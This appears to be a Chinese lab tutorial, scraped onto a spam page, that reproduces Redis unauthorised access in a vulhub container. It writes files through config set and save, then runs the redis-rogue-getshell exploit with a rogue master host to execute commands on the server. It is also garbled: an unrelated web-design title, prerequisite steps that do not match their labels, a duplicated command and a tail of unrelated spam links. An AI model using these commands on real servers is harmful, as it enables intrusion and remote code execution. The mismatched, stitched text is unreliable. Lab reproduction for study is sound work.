当前位置: 首页 > news >正文

涿州网站建设有限公司做旅游网站的意义

涿州网站建设有限公司,做旅游网站的意义,做网站推广如何,asp网站程序优点文章目录 搭建环境漏洞复现安装Exlopit并使用 前提条件: 1.安装docker docker pull medicean/vulapps:j_joomla_22.安装docker-compose docker run -d -p 8000:80 medicean/vulapps:j_joomla_23.下载vulhub 搭建环境 输入下面命令,来到Redis的路径下&am…

文章目录

  • 搭建环境
  • 漏洞复现
  • 安装Exlopit并使用

前提条件:

1.安装docker

docker pull medicean/vulapps:j_joomla_2

2.安装docker-compose

docker run -d -p 8000:80 medicean/vulapps:j_joomla_2

3.下载vulhub

搭建环境

输入下面命令,来到Redis的路径下:

cd vulhub/redis/4-unacc

然后输入下面命令,安装容器并启动

sudo docker-compose up -d && sudo docker-compose up -d

如图,安装中:

在这里插入图片描述

安装完成并启动后查看容器状态:

sudo docker-compose ps -a

状态为已启动,redis的端口号是6379:

在这里插入图片描述

漏洞复现

用下面命令连接redis数据库,发现不需要账号密码,可以直接连接数据库:

redis-cli -h 127.0.0.1

说明redis存在未授权访问漏洞:

在这里插入图片描述

在数据库中用info命令查看数据库信息,可以查看:

在这里插入图片描述

然后在数据库中添加键值对和一个txt文件,并尝试访问文件,如果能访问成功,说明数据库有读写文件的权限。

新建键值对并查看

set name EMT
get name

执行命令后可以成功查看:
在这里插入图片描述

设置一个目录:

 config set dir /tmp/

设置新建一个文件:

 config set dbfilename EMT.txt

保存

save

如图,命令执行成功:

在这里插入图片描述

由于连接的是docker容器的数据库,所以我们可以在docker中查看刚刚新建的文件是否存在,首先登录容器:(-it后接的参数是容器的ID)

sudo docker exec -it 4-unacc-redis-1 /bin/bash

登录成功后用命令查看tmp目录下的文件是否创建成功:

ls /tmp

发现创建成功,说明redis数据库可以读取写入文件,这是redis存在的未授权访问漏洞:

在这里插入图片描述

安装Exlopit并使用

进入kali的tools目录下,执行下面命令,获取文件:

git clone https://github.com/vulhub/redis-rogue-getshell.git

下载完成后进入目录

cd redis-rogue-getshell/RedisModulesSDK

输入make进行编译,编译成功后会出现exp.so文件:

在这里插入图片描述

然后在redis-master.py的上级目录执行下面命令:

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 10.9.75.45 -P 8888 -f RedisModulesSDK/exp.so -c "id"

如图,获得了uid和组ID:

在这里插入图片描述

输入whoami命令查看:

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 10.9.75.45 -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

执行成功,回显出数据库的名字:

在这里插入图片描述

说明该漏洞可以用来获取数据库信息

http://www.yayakq.cn/news/674482/

相关文章:

  • 韶关网站制作建网站衡水哪家强?
  • 群晖wordpress建站教程中国建设银行官网个人网上银行
  • 旅游网站建设公司福步外贸论坛招聘
  • 安康市劳务公司优化网站排名解析推广
  • 网站的ip地址是什么连云港公司网站优化服务
  • 上海门户网站开发杭州seo优化
  • 如何做网站本地服务器wordpress能用的插件吗
  • 湘潭网站建设方案费用招生网站开发
  • 南宁网站建设seo卫浴品牌排行榜前十名
  • 青海公路工程建设总公司网站网站怎么做翻页
  • 家用电脑做网站如何自己开一家外贸公司
  • 怎么做彩票网站收款人上海网站建设品牌
  • 建设监理工程公司网站wordpress密码文件夹
  • 茂名企业自助建站系统青岛 网站制作
  • 做网站月入7000上海app开发定制公司
  • 2008 做网站织梦网站案例
  • 商业网站平台网站搜索引擎优化方案的案例
  • 西安做推广网站设计wordpress分享内容插件
  • 做微信公众号的网站高密公司做网站
  • 建设好网站外链有哪些方式wordpress后台更新等待响应
  • 网站建设实施计划书wordpress首页显示文章缩略图
  • 智慧团建网站登录密码网站优化排名易下拉用法
  • 做美食网站的模板东莞个人网站推广建设
  • 可信网站可信站点网站首页作用
  • 网站上线稳定后的工作免费的个人服务器
  • vs2017做的网站永康网站建设的公司
  • 数字货币网站开发昆明网站制作内容
  • wordpress主题网站公司管理制度完整版
  • 山西网站建设phpcmsv9 网站搬家
  • 网站建设宗旨及商业模式网站做全景图预览